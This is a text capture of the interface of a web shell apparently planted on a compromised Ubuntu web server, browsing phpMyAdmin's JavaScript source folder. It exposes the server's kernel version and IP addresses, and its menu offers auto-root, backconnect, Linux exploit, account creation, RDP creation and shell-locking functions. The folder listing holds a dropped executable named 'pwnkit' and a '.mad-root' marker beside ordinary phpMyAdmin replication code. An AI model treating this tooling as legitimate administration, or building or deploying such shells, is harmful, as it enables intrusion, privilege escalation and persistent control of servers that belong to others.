Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.15.27.146
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
resources /
js /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
codemirror
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
designer
[ DIR ]
drwxr-xr-x
jqplot
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
setup
[ DIR ]
drwxr-xr-x
table
[ DIR ]
drwxr-xr-x
transformations
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
chart.ts
18.74
KB
-rw-r--r--
console.ts
140
B
-rw-r--r--
datetimepicker.ts
3.84
KB
-rw-r--r--
drag_drop_import.ts
14.26
KB
-rw-r--r--
error_report.ts
10.68
KB
-rw-r--r--
export.ts
36.8
KB
-rw-r--r--
export_output.ts
469
B
-rw-r--r--
gis_data_editor.ts
15.77
KB
-rw-r--r--
home.ts
625
B
-rw-r--r--
import.ts
13.44
KB
-rw-r--r--
jquery.sortable-table.ts
11.17
KB
-rw-r--r--
main.ts
2.21
KB
-rw-r--r--
makegrid.ts
98.85
KB
-rw-r--r--
menu_resizer.ts
6.55
KB
-rw-r--r--
multi_column_sort.ts
1.53
KB
-rw-r--r--
name-conflict-fixes.ts
83
B
-rw-r--r--
normalization.ts
29.93
KB
-rw-r--r--
ol.mjs
958
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
replication.ts
3.98
KB
-rw-r--r--
shortcuts_handler.ts
3.78
KB
-rw-r--r--
sql.ts
48.77
KB
-rw-r--r--
triggers.ts
24
KB
-rw-r--r--
u2f.ts
3.46
KB
-rw-r--r--
validator-messages.ts
1.65
KB
-rw-r--r--
webauthn.ts
4.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : replication.ts
import $ from 'jquery'; import { AJAX } from './modules/ajax.ts'; import { Functions } from './modules/functions.ts'; import { ajaxShowMessage } from './modules/ajax-message.ts'; import getJsConfirmCommonParam from './modules/functions/getJsConfirmCommonParam.ts'; /** * @fileoverview Javascript functions used in server replication page * @name Server Replication * * @requires jQueryUI */ var randomServerId = Math.floor(Math.random() * 10000000); var confPrefix = 'server-id=' + randomServerId + '\nlog_bin=mysql-bin\nlog_error=mysql-bin.err\n'; function updateConfig () { var confIgnore = 'binlog_ignore_db='; var confDo = 'binlog_do_db='; var databaseList = ''; if ($('#db_select option:selected').length === 0) { $('#rep').text(confPrefix); } else if ($('#db_type option:selected').val() === 'all') { $('#db_select option:selected').each(function () { databaseList += confIgnore + $(this).val() + '\n'; }); $('#rep').text(confPrefix + databaseList); } else { $('#db_select option:selected').each(function () { databaseList += confDo + $(this).val() + '\n'; }); $('#rep').text(confPrefix + databaseList); } } /** * Unbind all event handlers before tearing down a page */ AJAX.registerTeardown('replication.js', function () { $('#db_type').off('change'); $('#db_select').off('change'); $('#primary_status_href').off('click'); $('#primary_replicas_href').off('click'); $('#replica_status_href').off('click'); $('#replica_control_href').off('click'); $('#replica_errormanagement_href').off('click'); $('#replica_synchronization_href').off('click'); $('#db_reset_href').off('click'); $('#db_select_href').off('click'); $('#reset_replica').off('click'); }); AJAX.registerOnload('replication.js', function () { $('#rep').text(confPrefix); $('#db_type').on('change', updateConfig); $('#db_select').on('change', updateConfig); $('#primary_status_href').on('click', function () { $('#replication_primary_section').toggle(); }); $('#primary_replicas_href').on('click', function () { $('#replication_replicas_section').toggle(); }); $('#replica_status_href').on('click', function () { $('#replication_replica_section').toggle(); }); $('#replica_control_href').on('click', function () { $('#replica_control_gui').toggle(); }); $('#replica_errormanagement_href').on('click', function () { $('#replica_errormanagement_gui').toggle(); }); $('#replica_synchronization_href').on('click', function () { $('#replica_synchronization_gui').toggle(); }); $('#db_reset_href').on('click', function () { $('#db_select option:selected').prop('selected', false); $('#db_select').trigger('change'); }); $('#db_select_href').on('click', function () { $('#db_select option').prop('selected', true); $('#db_select').trigger('change'); }); $('#reset_replica').on('click', function (e) { e.preventDefault(); var $anchor = $(this); var question = window.Messages.strResetReplicaWarning; $anchor.confirm(question, $anchor.attr('href'), function (url) { ajaxShowMessage(); AJAX.source = $anchor; var params = getJsConfirmCommonParam({ 'ajax_page_request': true, 'ajax_request': true }, $anchor.getPostData()); $.post(url, params, AJAX.responseHandler); }); }); ($('#button_generate_password') as JQuery<HTMLInputElement>).on('click', function () { Functions.suggestPassword(this.form); }); ($('#nopass_1') as JQuery<HTMLInputElement>).on('click', function () { this.form.pma_pw.value = ''; this.form.pma_pw2.value = ''; this.checked = true; }); $('#nopass_0').on('click', function () { document.getElementById('text_pma_change_pw').focus(); }); });
Close